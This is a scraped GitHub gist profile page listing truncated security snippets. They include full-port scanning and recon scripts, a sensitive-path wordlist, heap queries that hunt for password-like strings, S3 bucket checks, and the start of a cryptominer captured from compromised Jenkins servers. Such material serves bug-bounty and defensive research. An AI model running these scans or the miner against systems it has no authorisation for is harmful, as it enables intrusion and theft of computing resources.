Skip to content

Instantly share code, notes, and snippets.

💭
Hacking!

Robbie random-robbie

💭
Hacking!
Block or report user

Report or block random-robbie

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View mass-scan.sh
#!/bin/bash
strip=$(echo $1|sed 's/https\?:\/\///')
echo ""
echo "######################################"
echo $strip
echo "######################################"
echo ""
massscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee $strip_scan
View jhat base searches
select {o: s,val:s.value.toString()} from java.lang.String s
where
/^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{5,15}$/.test(s.value.toString())
select {o: s,val:s.value.toString()} from java.lang.String s
where
/^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{19,31}$/.test(s.value.toString())
select {o: s,val:s.value.toString()} from java.lang.String s
where
View content_nullenc0de.txt
This file has been truncated, but you can view the full file.
!.gitignore
!.htaccess
!.htpasswd
!access_setup.asp
!Admin
!archiv
!Archive
!backup
!bin/ads/google
View null-find.sh
#!/bin/bash
wget https://gist.githubusercontent.com/jhaddix/86a06c5dc309d08580a018c66354a056/raw/96f4e51d96b2203f19f6381c8c545b278eaa0837/all.txt
amass enum -config config.ini -brute -w all.txt
wget https://gist.githubusercontent.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7/raw/146f367110973250785ced348455dc5173842ee4/content_discovery_nullenc0de.txt
gobuster -u http://example.com -w content_discovery_nullenc0de.txt
View s3tko.sh
#!/bin/bash
touch index.html
touch error.html
aws s3api create-bucket --bucket my-bucket --region us-east-1
aws s3 website s3://my-bucket/ --index-document index.html --error-document error.html
aws s3 cp index.html s3://mybucket --acl public-read
View Dockerfile
FROM ubuntu:latest
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update -y && \
apt-get install -y \
git \
xvfb \
x11vnc \
wget \
@random-robbie
random-robbie / jenkins-miner.sh
Created Jan 3, 2019
Miner found on jenkins servers.
View jenkins-miner.sh
#!/bin/bash
if [[ $(whoami) != "root" ]]; then
for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
kill -9 $tr || : ;
done;
fi
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
View ssrf.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View bucket_list.sh
echo "[*] Now Checking for Open S3 Buckets for listing dirs....[*]"
aws s3 ls s3://$1 --acl public-read >/dev/null 2>/dev/null
RESULT=$?
if [ $RESULT -eq 0 ]; then
echo "[*] Bucket has Dirlistings Enabled [*]"
echo "[*] Bucket has Dirlistings Enabled https://$1.s3.amazonaws.com [*]" >> /home/tools/mass-bounty/s3-results/$1-dirlistings.txt
You can’t perform that action at this time.